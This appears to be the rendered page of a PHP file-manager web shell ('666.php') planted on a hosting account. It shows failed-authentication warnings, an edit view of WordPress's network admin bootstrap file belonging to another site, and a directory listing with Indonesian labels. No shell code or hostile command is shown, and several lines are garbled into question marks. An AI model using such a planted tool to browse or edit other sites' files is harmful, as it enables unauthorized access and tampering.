??????????????
??????????????
??????????????
??????????????
Warning : Undefined variable $auth in /home/u627560552/domains/kovexadvisory.com/public_html/666.php on line 546
Warning : Trying to access array offset on value of type null in /home/u627560552/domains/kovexadvisory.com/public_html/666.php on line 546
??????????????
??????????????
??????????????
??????????????
File Manager
✏️ Edit File: /home/mklsvubc/tlma.co.uk/wp-admin/network/admin.php
⬅ Kembali
<?php
/**
* WordPress Network Administration Bootstrap
*
* @package WordPress
* @subpackage Multisite
* @since 3.1.0
*/
define( 'WP_NETWORK_ADMIN', true );
/** Load WordPress Administration Bootstrap */
require_once dirname( __DIR__ ) . '/admin.php';
// Do not remove this check. It is required by individual network admin pages.
if ( ! is_multisite() ) {
wp_die( __( 'Multisite support is not enabled.' ) );
}
$redirect_network_admin_request = ( 0 !== strcasecmp( $current_blog->domain, $current_site->domain ) || 0 !== strcasecmp( $current_blog->path, $current_site->path ) );
/**
* Filters whether to redirect the request to the Network Admin.
*
* @since 3.2.0
*
* @param bool $redirect_network_admin_request Whether the request should be redirected.
*/
$redirect_network_admin_request = apply_filters( 'redirect_network_admin_request', $redirect_network_admin_request );
if ( $redirect_network_admin_request ) {
wp_redirect( network_admin_url() );
exit;
}
unset( $redirect_network_admin_request );
Nama
Tipe
Ukuran
Diubah
Aksi
🐘 about.php
php
245 B
2020-02-06 11:33
🐘 admin.php
php
1 KB
2020-02-06 11:33
🐘 contribute.php
php
255 B
2023-07-26 01:34
🐘 credits.php
php
249 B
2020-02-06 11:33
🐘 edit.php
php
878 B
2026-01-10 10:29
🐘 freedoms.php
php
251 B
2020-02-06 11:33
🐘 index.php
php
2.8 KB
2024-03-09 03:38
🐘 menu.php
php
4.7 KB
2025-02-08 16:44
🐘 plugin-editor.php
php
266 B
2021-12-22 01:06
🐘 plugin-install.php
php
377 B
2020-05-24 13:17
🐘 plugins.php
php
249 B
2020-02-06 11:33
🐘 privacy.php
php
249 B
2020-02-06 11:33
🐘 profile.php
php
254 B
2020-02-06 11:33
🐘 settings.php
php
21.5 KB
2025-09-29 02:38
🐘 setup.php
php
247 B
2020-02-06 11:33
🐘 site-info.php
php
7.6 KB
2026-02-16 22:02
🐘 site-new.php
php
9.5 KB
2025-12-10 03:43
🐘 site-settings.php
php
5.8 KB
2026-02-16 22:02
🐘 site-themes.php
php
6.7 KB
2026-01-06 10:57
🐘 site-users.php
php
11.5 KB
2026-02-16 22:02
🐘 sites.php
php
14.2 KB
2025-11-25 10:46
🐘 theme-editor.php
php
264 B
2021-12-22 01:06
🐘 theme-install.php
php
374 B
2020-05-24 13:17
🐘 themes.php
php
15.6 KB
2026-01-06 10:57
🐘 update-core.php
php
253 B
2020-02-06 11:33
🐘 update.php
php
450 B
2020-04-05 07:02
🐘 upgrade.php
php
4.8 KB
2026-01-06 10:57
🐘 user-edit.php
php
253 B
2020-02-06 11:33
🐘 user-new.php
php
5.1 KB
2025-02-08 16:44
🐘 users.php
php
10.3 KB
2026-02-17 14:25